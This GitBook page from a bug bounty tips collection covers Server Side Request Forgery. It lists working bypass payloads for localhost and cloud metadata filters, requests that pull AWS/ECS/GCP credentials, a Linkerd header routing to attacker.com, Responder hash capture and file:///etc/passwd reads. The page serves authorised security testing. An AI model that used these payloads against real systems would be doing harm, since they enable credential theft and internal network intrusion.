Book of BugBounty Tips
Search…
Introduction
OSINT / Recon
API
Cross Site Request Forgery (CSRF)
Server Side Request Forgery (SSRF)
Sensitive Information Disclosure
Cross Site Scripting (XSS)
CRLF
Remote Code Execution (RCE)
Email Related
File Upload
Open Redirect
IDOR
Injection
XXE
Local / Remote File Inclusion
Authentication / Authorization
Account Takeover
Application Login
Clickjacking
Parameter Pollution
Fuzzing
Application Logic Bypasses
Bypasses
Mobile
Password Reset
Web Cache
Server Side Template Injection
Tips from @EdOverflow
Tips From @intigriti
Hackpack From @yeswehack
Tips from @YogoshaOfficial
Tips from @Jhaddix
Tips from Ben
Tips from Other Sources
Tips from Blog posts / other hunters
Others
Bugbounty Related Websites / Blogs
Twitter Threads
Docker and k8s
Tweets Collection by @Pentesterland
Windows
Linux
Burp suite
Scope Based Recon Tips
Powered By
GitBook
Server Side Request Forgery (SSRF)
#BugBounty Tip: When you find an SSRF vulnerability, run Responder on your server and make the vulnerable system connect back to you. Sometimes you can get NetNTLM hashes and either crack them or escalate it to an SMB Relay attack. #bugbountytip
Use URLs with embedded credentials (e.g. http://user:
[email protected]
) to login on internal http services when exploiting SSRF vulnerability.
#bugbountytip Found Linkerd service (look for headers such as “Via: linkerd” or “l5d-*”)? Try SSRF by overriding dtab via request header, e.g. “l5d-dtab: /svc/* => /$/inet/attacker.com/80” to reach your server or “l5d-dtab: /svc/* => /$/inet/169.254.169.254/80” for AWS metadata.
In case you wanted to test an SSRF but don't own a vps and burp collaborator is blocked you can use this https://canarytokens.org/generate
#Bugbountytip Got a SSRF? no metadata endpoints to hit? Try https://kubernetes.default.svc/metrics if you get a load crap come back jackpot you've hit the kubernetes API and this should indicate it's shit the bed time for any security team. (url can change)
When you have a SSRF vulnerability on a Google Cloud server, the fastest way to grab all internal metadata is this "All in one" payload : hxxp://metadata.google.internal/computeMetadata/v1beta1/?recursive=true #BugBountyTip
Just had a weird SSRF 'bypass' which would only pull data from their domain so anything you queried would be hxxps://www.theirdomain.com/reflectedhere/. Weirdly using /%2F//mysite.com/ caused it to hit external sites. Why? I have no idea. #bugbountytip
When dealing with SVG XLINK SSRF, in order to fingerprint the versions of libraries on vulnerable server, Generate the wordlist locally and fuzz it. find /usr -type f -name "*.png" >> all_usr_png.txt #bugbountytip
#bugbountytip Use URLs with embedded credentials (e.g. http://user:
[email protected]
) to login on internal http services when exploiting SSRF vulnerability.
Did you find the #SSRF, but http://169.254.169.254/ is blacklisted? #protip try http://0xA9FEA9FE/, http://0251.0376.0251.0376/ or get more examples from @agarri_fr talk
#BugBounty #bugbounties #bugbountytip #infosec Bypass #SSRF filters by using http://127.1 instead of http://127.0.0.1 It resolves to the same but confuses filters blocking localhost/127.0.0.1 specifically!
#SSRF #ProTip Sometimes, the server appends something (path, parameters, ...) to an URL your control. Simply add "#" to your URL, that may work!
Found a JIRA SSRF and want to make it more impactful? Look for what's running on port 7990, you might end up in a BitBucket server running internally with public repo access. If yes, source code is just a few hacks away.
If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(http://google.com ) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips
169.254.169.254
http://169.254.169.254.xip.io
credit to @xenonxesece tweet. #
SSRF
#
bugbountytips
#
Bugcrowd
#
bugbounty
SSRF are file:///etc/passwd : Not authorized file://\/\/etc/passwd : Work
One ssrf/lfi I come across is using UNC file paths. If you’re testing a windows host and the application is loading file.txt you can replace that with \\http://dns.you.com\a and look for a dns hit and then try Responder if there’s egress or \\
[email protected]
\
When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past. #bugbountytip #bugbountytip #bugbounty
When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018) #bugbountytip #bugbounty
Got RCE or SSRF inside an AWS Lambda function? Request "localhost:9001/2018-06-01/runtime/invocation/next" for the function's event data. Check the HTTP headers returned
[email protected]
file:///etc/passwd : Not authorized file://\/\/etc/passwd : Work
#BugBounty
If you have an SSRF with file system access on an ECS instance then try extracting /proc/self/environ to get UUID and then try hitting ECS metadata curl http://169.254.170.2/v2/credentials/
This way you'll extract IAM keys of the attached role
SSRF at an endpoint looking for a valid YouTube url. http://127.0.0.1:80 doesn’t work but http://127.0.0.1:80?http://youtu.be/dQw4w9WgXcQ works
SSRF AWS Bypasses to access metadata endpoint. Converted Decimal IP: http://2852039166/latest/meta-data/ IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/ IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/ #bugbounty #bugbountytips #bugbountytip
SSRF Bypass list for localhost (127.0.0.1):
1
http://127.1/
2
http://0000::1:80/
3
http://[::]:80/
4
http://2130706433/
5
http://
[email protected]
6
http://0x7f000001/
7
http://017700000001
8
http://0177.00.00.01
9
10
Also using a redirect to localhost will often work.
Copied!
SSRF payloads http://[::]:80/ http://[::]:25/ SMTP http://[::]:22/ SSH http://[::]:3128/ http://0000::1:80/ http://0000::1:25/ SMTP http://0000::1:22/ SSH http://0000::1:3128/ http://0177.0.0.1/ http://2130706433/ = http://127.0.0.1 http://3232235521/ http://192.168.0.1
A small Burpsuite trick which helped me to find Blind SSRF -
Step 1: Use Intruder to Bruteforce Headers Step 2: Add Burp collaborator URL as value. Step 3: Add prefix numerical payload (Pitchfork) Step 4: Use Tarborator Extension to monitor hits
When you find a public form (contact form,etc.) try these payloads (blind ssrf), if you receive a request on your server, try SSTI... #bugbountytips #bugbounty #bugbou
ntytip
https://twitter.com/SMHTahsin33/status/1293601681834307584?s=20
https://twitter.com/z0idsec/status/1301145611303940096?s=20
add this one to your wordlist : /_includes/framer.php juicy blind ssrf via `base` param
#bugbountytips
#bugbountytip
If you have a blind SSRF that can only read images (but for some reason can't read ICO files), try and find Confluence running on the internal network and request /images/icons/linkext7.gif to prove that you can access internal resources
Previous
Cross Site Request Forgery (CSRF)
Next
Sensitive Information Disclosure
Last modified
1mo ago
Copy link